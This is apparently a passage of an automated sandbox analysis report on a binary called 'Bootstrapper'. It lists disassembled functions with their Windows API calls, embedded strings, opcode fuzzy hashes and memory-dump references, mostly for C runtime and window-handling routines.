Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d663734b86c134a9f40a1b1c55ba3f9ce223303f5b257fcdb12769bd22f7f6ac
Instruction ID: e284f69ff286bd98b08f3228958cb7d13aaee94b56f4c13b8b86b5ed1b7d0d89
Opcode Fuzzy Hash: d663734b86c134a9f40a1b1c55ba3f9ce223303f5b257fcdb12769bd22f7f6ac
Instruction Fuzzy Hash: 173107B5D0521D9BDB20DFA4D989BCCBBB8AF08304F1040AAE40DAB250EB759A858F44

Function 00E28EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E28FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E28FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00E28FCC

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 40416f8d0eaa80f632425de81445789b788f7b247c86f1b8b70fdaba6853c214
Instruction ID: 477dd34d66a0d0b3baebd4f69e92fd7d2fc1b8605b3b5acec29f4759c9d387f8
Opcode Fuzzy Hash: 40416f8d0eaa80f632425de81445789b788f7b247c86f1b8b70fdaba6853c214
Instruction Fuzzy Hash: E931B77590122C9BCB21DF65DD89BDDBBB4AF08310F5052EAE41CA6250EB709F858F44

Function 00E1AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E1AF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00E3E72C,?,?), ref: 00E1AF84

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a748e8a2080aac90c8f110eec26ac844d4593de930a02512fb066cd5f53a71b5
Instruction ID: a7de146f8a6c4a210651ae19c96732c1bc191194dca05f1b74ce5f03e05d7836
Opcode Fuzzy Hash: a748e8a2080aac90c8f110eec26ac844d4593de930a02512fb066cd5f53a71b5
Instruction Fuzzy Hash: 4501217A200308AED7109F75DC49F9A7BBCEF49711F505422FA05F7290D3709969CBA5

Function 00E06C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00E06DDF,00000000,00000400), ref: 00E06C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E06C95

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 866ed21b9822de925d0e392bab60ad585d2f718d8c60643a500cd76ffc1d06fb
Instruction ID: 91b95aa4e5fefa1ad580f5cdb11d2994d6e38d506b7f76c417ff1e6e040c1a78
Opcode Fuzzy Hash: 866ed21b9822de925d0e392bab60ad585d2f718d8c60643a500cd76ffc1d06fb
Instruction Fuzzy Hash: A8D0A730344300BFFA040B324D4AF1A7F99BF40B45F14C0047340F40E0C6748464AA14

Function 00E1F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E1F66A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5faeed5dc6ec84dba653dfa0df11ab5ec2ba6161d7ef84a1925520fec9c5cb50
Instruction ID: f0164f41ab536511c95c075f590f954b391377cc88e532022ce022c0a3e03ec3
Opcode Fuzzy Hash: 5faeed5dc6ec84dba653dfa0df11ab5ec2ba6161d7ef84a1925520fec9c5cb50
Instruction Fuzzy Hash: FE51AFB19106098FEB29CF59E8857EABBF0FB48358F24947AD411FB390D3749944CB90

Function 00E0B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00E0B16B

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b6e720d9b8d41b34b2bfef87198ef6567db7ce1f410f642ca77a9ff22794306e
Instruction ID: 7e879775c086908fb94dc41ab758ad8298cad068b11e4bdeeac0953563c3eed5
Opcode Fuzzy Hash: b6e720d9b8d41b34b2bfef87198ef6567db7ce1f410f642ca77a9ff22794306e
Instruction Fuzzy Hash: 7BF03AB8E002088FDB28CB29ED966D977F1FB99359F104295D515B37D0C3B0ADC98E60

Function 00E1F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00E1F3A5), ref: 00E1F9DA

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 12bd4bfeb3e3afe99236884085e27d6f5fd342b7242616aa8511a14d07c28517
Instruction ID: 68d55e4e678744e8430b3a716fdcb484f3baef9adb2f9526ff574f5672ce55cc
Opcode Fuzzy Hash: 12bd4bfeb3e3afe99236884085e27d6f5fd342b7242616aa8511a14d07c28517
Instruction Fuzzy Hash:

Function 00E2C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00E2C030

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: db795c305369535929092fa17570211f2554ec6ab294a22134ce29ad4a8555b0
Instruction ID: 9962b88b705370636a2e8f2f8b706c0a053a05607619dd2cd169884336300379
Opcode Fuzzy Hash: db795c305369535929092fa17570211f2554ec6ab294a22134ce29ad4a8555b0
Instruction Fuzzy Hash: A6A011302022008F83008F32AE0CA0E3AAAAB002C2308002AA208E0020EAA080A8AB00

Function 00E0E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00E0E30E

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

Part of subcall function 00E11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E41030,00000200,00E0D928,00000000,?,00000050,00E41030), ref: 00E11DC4

_strlen.LIBCMT ref: 00E0E32F
SetDlgItemTextW.USER32(?,00E3E274,?), ref: 00E0E38F
GetWindowRect.USER32(?,?), ref: 00E0E3C9
GetClientRect.USER32(?,?), ref: 00E0E3D5
GetWindowLongW.USER32(?,000000F0), ref: 00E0E475
GetWindowRect.USER32(?,?), ref: 00E0E4A2
SetWindowTextW.USER32(?,?), ref: 00E0E4DB
GetSystemMetrics.USER32(00000008), ref: 00E0E4E3
GetWindow.USER32(?,00000005), ref: 00E0E4EE
GetWindowRect.USER32(00000000,?), ref: 00E0E51B
GetWindow.USER32(00000000,00000002), ref: 00E0E58D

Strings

t, xrefs: 00E0E34A
CAPTION, xrefs: 00E0E4BD
$%s:, xrefs: 00E0E302
d, xrefs: 00E0E3F5

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t
API String ID: 2407758923-369353836
Opcode ID: c309e97d053c6fbaea1c02c480267364a5455fba2a6627ac43dafbe27c9c029e
Instruction ID: 9da515675f056abd8033ecc361a84011fa772e8d6e1742e3794e80fda019ff25
Opcode Fuzzy Hash: c309e97d053c6fbaea1c02c480267364a5455fba2a6627ac43dafbe27c9c029e
Instruction Fuzzy Hash: 9881B371108301AFD710DFB9DC89A6BBBE9EBC9704F04192DFA84B3291D674E9498B52

Function 00E2CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00E2CB66

Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C71E
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C730
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C742
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C754
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C766
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C778
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C78A
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C79C
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7AE
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7C0
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7D2
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7E4
Part of subcall function 00E2C701: _free.LIBCMT ref: 00E2C7F6

_free.LIBCMT ref: 00E2CB5B

Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4

_free.LIBCMT ref: 00E2CB7D
_free.LIBCMT ref: 00E2CB92
_free.LIBCMT ref: 00E2CB9D
_free.LIBCMT ref: 00E2CBBF
_free.LIBCMT ref: 00E2CBD2
_free.LIBCMT ref: 00E2CBE0
_free.LIBCMT ref: 00E2CBEB
_free.LIBCMT ref: 00E2CC23
_free.LIBCMT ref: 00E2CC2A
_free.LIBCMT ref: 00E2CC47
_free.LIBCMT ref: 00E2CC5F

Strings

h, xrefs: 00E2CC0E

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h
API String ID: 161543041-3415971826
Opcode ID: 201d0f9adcbecb37c216cc901cd8fcdc35f0222b80924195ec9fd8c3018e07b9
Instruction ID: eab956c91887a415a1d29a4d011411792edfb89d67aa0189e24de189e4eaad2b
Opcode Fuzzy Hash: 201d0f9adcbecb37c216cc901cd8fcdc35f0222b80924195ec9fd8c3018e07b9
Instruction Fuzzy Hash: B8315C316013259FEB20AA39F946B5AB7E9AF50318F207829E548F71A2DF31EC44CB10

Function 00E296F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E29705

Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4

_free.LIBCMT ref: 00E29711
_free.LIBCMT ref: 00E2971C
_free.LIBCMT ref: 00E29727
_free.LIBCMT ref: 00E29732
_free.LIBCMT ref: 00E2973D
_free.LIBCMT ref: 00E29748
_free.LIBCMT ref: 00E29753
_free.LIBCMT ref: 00E2975E
_free.LIBCMT ref: 00E2976C

Strings

0d, xrefs: 00E296FC

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0d
API String ID: 776569668-2809447700
Opcode ID: 36cd2f1bebeacf48050df412a08e2f4527b890af362c2fa22234e896a2029913
Instruction ID: aaa786101eb9ab237b73cfa9834fce209f6a14f6862f2876de2711b7eb647d6b
Opcode Fuzzy Hash: 36cd2f1bebeacf48050df412a08e2f4527b890af362c2fa22234e896a2029913
Instruction Fuzzy Hash: 8311D476111019BFDB01EF54EA42CD93BB9EF14350B1168A1FA08AF272DE32DA549B84

Function 00E19711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E19736
_wcslen.LIBCMT ref: 00E197D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00E197E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E19806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E1982D

Strings

utf-8"></head>, xrefs: 00E1976B
Fjun, xrefs: 00E1982D
<html>, xrefs: 00E19755, 00E1978E
</html>, xrefs: 00E197B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00E19760

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: Fjun$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-1684715023
Opcode ID: 8fc0649480188f47c0b62181ac260a2be516bb8f27e4eebcf137b47477682d36
Instruction ID: 2cb2d5271c2c0bbe8eae7ced828650c91bc111a54ca9bbc6da3ed26c1302e9e6
Opcode Fuzzy Hash: 8fc0649480188f47c0b62181ac260a2be516bb8f27e4eebcf137b47477682d36
Instruction Fuzzy Hash: 6C3128725083157EE725AF34AC06FABBBD89F42710F14211EF501B61D3EB74DA8983A6

Function 00E1D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00E1D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00E1D6ED

Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00E1D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E1D720
GetObjectW.GDI32(00000000,00000018,?), ref: 00E1D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E1D75D
DeleteObject.GDI32(00000000), ref: 00E1D764
GetWindow.USER32(00000000,00000002), ref: 00E1D76D

Strings

STATIC, xrefs: 00E1D6F3

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: f2785498f69e3f593f07fb87e1db6b24381ba917a640fa27b9cf0748a33afe11
Instruction ID: ba3848b751c7d0014f85fc436f02ec1e7c11be61a6fe9028be31351372afb176
Opcode Fuzzy Hash: f2785498f69e3f593f07fb87e1db6b24381ba917a640fa27b9cf0748a33afe11
Instruction Fuzzy Hash: AC113A726053107FE2206B71AC4AFEF769CAF54751F006121FA51F10D2D6A48E8942B5

Function 00E22E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E22F50
___TypeMatch.LIBVCRUNTIME ref: 00E2305E
_UnwindNestedFrames.LIBCMT ref: 00E231B0
CallUnexpected.LIBVCRUNTIME ref: 00E231CB
_abort.LIBCMT ref: 00E231D0

Strings

csm, xrefs: 00E22E6E
csm, xrefs: 00E22F87
csm, xrefs: 00E22EDB

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 418950f48319588771404cf2bc39e1219f1a66e01714813af55445039f9c4a97
Instruction ID: 1828c3301a55e9effccb4cff0b9081762d99ee963d84cfb3b392d61d0179bbb9
Opcode Fuzzy Hash: 418950f48319588771404cf2bc39e1219f1a66e01714813af55445039f9c4a97
Instruction Fuzzy Hash: 29B19A71900229EFCF29DFA4E9819AEBBB5FF04314F14615AE9017B212C739DA61CF91

Function 00E0AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E0AF29

Strings

WQL, xrefs: 00E0AFDC
Windows 10, xrefs: 00E0B0C2
SELECT * FROM Win32_OperatingSystem, xrefs: 00E0AFCA
Name, xrefs: 00E0B0B0
n, xrefs: 00E0AFC0
ROOT\CIMV2, xrefs: 00E0AF5C

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n
API String ID: 3519838083-140586453
Opcode ID: 32f652d08f2f1aaf256392c8645c75753c74f82a29fdc0348eb992ac2ce135c0
Instruction ID: bb146b444d5120ad21e33e14e4d3da29632b10e8f77e662ad2f5c699f0c97a10
Opcode Fuzzy Hash: 32f652d08f2f1aaf256392c8645c75753c74f82a29fdc0348eb992ac2ce135c0
Instruction Fuzzy Hash: BE716C71A00219EFDB14DFA5CC99DAFBBB9FF48714B041169E512B72A0CB30AD85CB50

Function 00E06FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E06FAA
_wcslen.LIBCMT ref: 00E07013
_wcslen.LIBCMT ref: 00E07084

Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00

Strings

UNC\, xrefs: 00E07051
\??\, xrefs: 00E0702B
SeCreateSymbolicLinkPrivilege, xrefs: 00E06FCC
SeRestorePrivilege, xrefs: 00E06FC2

Memory Dump Source

